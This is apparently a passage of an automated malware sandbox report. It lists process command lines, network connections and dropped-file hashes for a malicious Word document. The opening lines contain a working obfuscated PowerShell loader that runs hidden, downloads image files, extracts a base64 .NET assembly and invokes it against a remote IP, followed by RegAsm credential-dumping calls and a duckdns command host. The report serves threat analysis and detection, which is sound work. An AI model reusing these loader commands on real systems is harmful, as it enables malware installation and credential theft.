TreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreFIDgTreRQBRDgTreC8DgTreMQDgTre3DgTreDEDgTreNwDgTrevDgTreDgDgTreOQDgTreuDgTreDgDgTreODgTreDgTrexDgTreC4DgTreODgTreDgTrezDgTreC4DgTreNDgTreDgTre1DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.REQ/1717/89.881.83.451//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fqfseabstkltxywkrqgjjh"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qstdftmtgsdyzfkwabbkttwdn"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qstdftmtgsdyzfkwabbkttwdn"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\amywflxncavljlgasmnmwyquokoj"

Network

Country Destination Domain Proto
US 8.8.8.8:53 2s.gg udp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
US 154.38.188.98:80 154.38.188.98 tcp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.97.2:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 8.8.8.8:53 lasteast.duckdns.org udp
NL 91.92.254.18:2401 lasteast.duckdns.org tcp
NL 91.92.254.18:2401 lasteast.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

memory/2892-1-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/2892-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab5D9D.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar61BA.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/624-69-0x000000002FC81000-0x000000002FC82000-memory.dmp

memory/624-71-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/624-73-0x0000000003690000-0x0000000003692000-memory.dmp

memory/2892-74-0x0000000002F40000-0x0000000002F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{9751B3B7-7E2C-43C2-B681-86DEF0417091}

MD5 2490625e25b7e607cbdef848ba0a304b
SHA1 6fe92f24d2b2daf3c8e1538b4d16e155eb001b59
SHA256 d8874856d79e93ee69a05e17dcd8554c166b6e16623cc7c040f8df4ab02eed66
SHA512 96f6eed8aebb3bcb7dfb6a7f35fa57feef8223f4a2a90b8e62e7a29f7dd9cc10082ce5124a1bd926f874f01e7c0f2d4300743195b41c9c139bb966ebb437c0e1

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{48123BA5-C5A1-4886-8199-7D34F3DA3B53}.FSD

MD5 7f6f413ce20b48cd2c25dbd59d3544ba
SHA1 158c03f3e2552990aaa7a6006545cdd9fe5f1b79
SHA256 181f9ce21bbe318e87e3ff0e05bf9cf98231e5dc4c986198a4714f9e1663935d
SHA512 f49127856d9a0148d955fc4b147e33695e5489fafd6b707176aefc5206cf463ded7765ca267a1d5568182dbf4ae4496cfbbb0895cf26ba56c230d1fd22206f4b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 a8eab57689f17d581e4ecc05918ca2ff
SHA1 1bbe773fc962421d29b722948cf47c84986e6ec6
SHA256 e1842c35798c6d391c162cabd18f21eb49a258a71dfbdcf896bca28debc5826b
SHA512 f7339c3213ab2c1afb35d01cf4f24788f1827add56b41783db3498acbbeb71926d19f9c1e65407ea0ca664047e0af94a880f1c5992e3c7eb342514a245c79503

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{816C8E1F-50DF-44F3-A817-E6AE8D85C437}.FSD

MD5 0f8f96968407f7466d875d4ad6c17b2c
SHA1 d274173a14c38147554f2a6c9c4183548fae9565
SHA256 a4df84f4b68298b1ca454b1e23a4358c5e473842f485834271c6af22bf46bde9
SHA512 4cf307b6aa56351003aad6e1fe1e97398db436e948d42bc4a61e06b16bbd44dc01d9c42746ae9a2b3707eceac94c2769e6aad85958cd84e673f96c4e75246a86

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\23EIUNT7\kissinggreatwaytounderstandhowimkissingherwithlotofhearttounderstandyouaremygirliloveu_____sweethearttounderstandkissingmygirl[1].doc

MD5 338da1470f51aa8116271555ee990e96
SHA1 0e1cb790e5bc6534c8757794512a8394a1f12d13
SHA256 c02d7beb9210e4edc9fad4c7de3a6827994343e249d3f7544632d8f64847dc74
SHA512 00a79d3fb886066e5f701386e445457fa489b2a63083b75a2d8ae05965cdd21ac7a11dd5267950da882b4bd89d44860506cd650b57e138d96fff353b33919039

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231

MD5 e1a4145eaa8304bdadc78f305c2fb47a
SHA1 80e202a8894339e3a37ef82527c728699b357690
SHA256 c3e67a07f7c141e211bd7048801d634638bd688ac86e839b7dd880efa3e030b1
SHA512 d889ce90e1a131e6a99830b783fb3132402fc45ea03cdd5573a8e8b06bd5f213da3ec4db2bc937c020828cb4695a3420f132ad16165f7ea0a036903c111c6920

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231

MD5 fe9957a70857b1a647223e42e3113045
SHA1 2a9de2e884e46f01c8417e09d2d1b914b442f598
SHA256 faa00c989e870b03e92b015e51be69e2b71ef0feb9633f7764f117e4ae78b021
SHA512 1af8fe83d45311457caf685d55bf61988ca80a1ffcc16133a3a167c8c5a8b01ed629003aefda18c3f99a04476d212057ee6f7bc852240c3640432f17866447d1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\96DD3FB36E520A44B4555F9239BEA849_B4791CD67445EC7F0ECEA0014AB0ADA8

MD5 4a575578f56a0dc8e1f327f2506a9131
SHA1 84dd5df5851dae427605ed5187d3ef7331e7575b
SHA256 4beb4a8eb27e70d6d70573c74209e2e357c53ff746faba87e4c29a1cb0225388
SHA512 36ec4235d927985fccf3e015249f2d89387715e1e2bec388c1d62659d0f6ccb1423fb488de7ca9ec2399f60ecf3d4a9d094c9cc3eb416bff2958ddbd52aa5c29

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\96DD3FB36E520A44B4555F9239BEA849_B4791CD67445EC7F0ECEA0014AB0ADA8

MD5 7e144301ecb089ef2b6edc1aa9c426a6
SHA1 f387923342498e65d701f644fafd5f19dc3610f9
SHA256 6776418afb1112783f54beebbe05f75220f8f3fb816aaffd29c9eca1b493c2c9
SHA512 69b40c9d3870083414844cec5f76ba875a21a196f5a88322b834573b6017da6d247dcf2c1b71694c298284c1216add577a717ff4cf8f65bb680235d1771ecc0e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 e8f53904db1336034369e7073bcecb20
SHA1 b11d646ab2e2f445037218bdc8871c1c39561740
SHA256 da4572394335f59f8250420dec69844b42df76df29ca6ef614bb333324922f94
SHA512 60e044a438c5b99be3178b2460708b1a8f40097b471e5256a48221ae26ef8c1e96cf2b6a5147f81cf685aede4c2cc3b530257db037f9081d6c9ae3c039e8063b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 425b9a9fa4b19b9cd14d7528b7d37f3d
SHA1 f6be001f52342c55615aa32f6cb5f02e981befcd
SHA256 ee921fcd01ea9b3c1565f79de281d05601f1c2bf31afdcad53792f8242cc49cd
SHA512 2aec35a27e31b8ab26138b213b23957645e060647901876e77c6b5ea188912e634cf368d45073e7b9600fd380ed2bf2f609d762b49f337b48e10760eadd85698

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 30a2c37e41af5882796b9c4f496b559f
SHA1 47c3dd7cc562215b3958d184f13ef4e7b266e781
SHA256 e345687ebbff30ed3369b505f8208218a8d355803159aa0ea743fa242075ed7d
SHA512 3a4bccc122b3e8856771bf0e05a5417c7de24a8f074e357e19cc9b0d153bfe959e4d021b792ad32cabbc52b860ff1f4eb12ce30e8676a59241a6af6e4d7d3ca9

C:\Users\Admin\AppData\Roaming\createdkissingsomeone.vbs

MD5 5a00fbd90b552d6c44165a1b1ea8af3d
SHA1 88d2a19718dcc942adc92d30e274b9ae95ae84df
SHA256 fcef19600eb45805e23379e5f0adbcd1a35859aa01505af4cb17276af4d5443d
SHA512 9f7d33f47c8207653ae3a4ae76c86b27c281a86adae01633307592e2666cc9b4acdc118805c4e7a1e43ed16805fa7b100c3bfdafc06fd81794bd195b7a3252a7

memory/2892-191-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/2320-193-0x00000000025B0000-0x00000000025F0000-memory.dmp

memory/2320-192-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2320-194-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/624-195-0x000000007289D000-0x00000000728A8000-memory.dmp

memory/2320-196-0x00000000025B0000-0x00000000025F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 cefed928671ae6c4645cb42d7003704f
SHA1 b2739dc5461b832ded1e0ed9ceec22844da3393b
SHA256 9aaee4905958b561bd91453e9f32bf87048f1da2e1af069d521d81b6fe70586b
SHA512 fdb987b7c269830527391e012dd2ef8d32d3cbc1156ab139d88fcae2492fccb3e4a1e69832be608da521a1f8d41d41d64339f5daaa243f5a511f781d3ae1e1c6

memory/2808-202-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2808-203-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2808-204-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2808-205-0x0000000002730000-0x0000000002770000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 acfc0b2988f94f54fc01dc0fb2a9c56c
SHA1 ec76c6d5d13888cd711566e7b5e97c8e713150f6
SHA256 79c12cecfef26d2b637946e2b0419b329cb239a62abdefd5912c9aa383a63afb
SHA512 fbdbae70a264f89c7850b6a3da087467fc6947e98ba3740f1ec4bdee9090df75137a0b4cad62b0e6fa80706535502ec0925322f2930f0923bedd4bc25307dd66

memory/2320-267-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2320-268-0x00000000025B0000-0x00000000025F0000-memory.dmp

memory/2808-269-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/2808-270-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2808-271-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2808-272-0x0000000002730000-0x0000000002770000-memory.dmp

memory/112-274-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-276-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-278-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-282-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-283-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-281-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-280-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-284-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-285-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/112-287-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-289-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2808-291-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/112-293-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-292-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-294-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-295-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2320-296-0x000000006A270000-0x000000006A81B000-memory.dmp

memory/112-297-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-298-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-299-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-300-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-302-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2780-305-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2780-308-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2764-307-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2764-316-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2780-312-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2368-317-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2764-324-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2368-323-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2780-322-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2780-321-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2764-311-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2764-328-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2368-326-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2764-330-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2368-331-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2368-332-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2368-333-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fqfseabstkltxywkrqgjjh

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2780-338-0x0000000000400000-0x0000000000478000-memory.dmp

memory/112-340-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-344-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-343-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-345-0x0000000010000000-0x0000000010019000-memory.dmp

memory/112-346-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2764-347-0x0000000000400000-0x0000000000462000-memory.dmp

memory/112-348-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-349-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-350-0x0000000000400000-0x0000000000482000-memory.dmp

memory/112-351-0x0000000010000000-0x0000000010019000-memory.dmp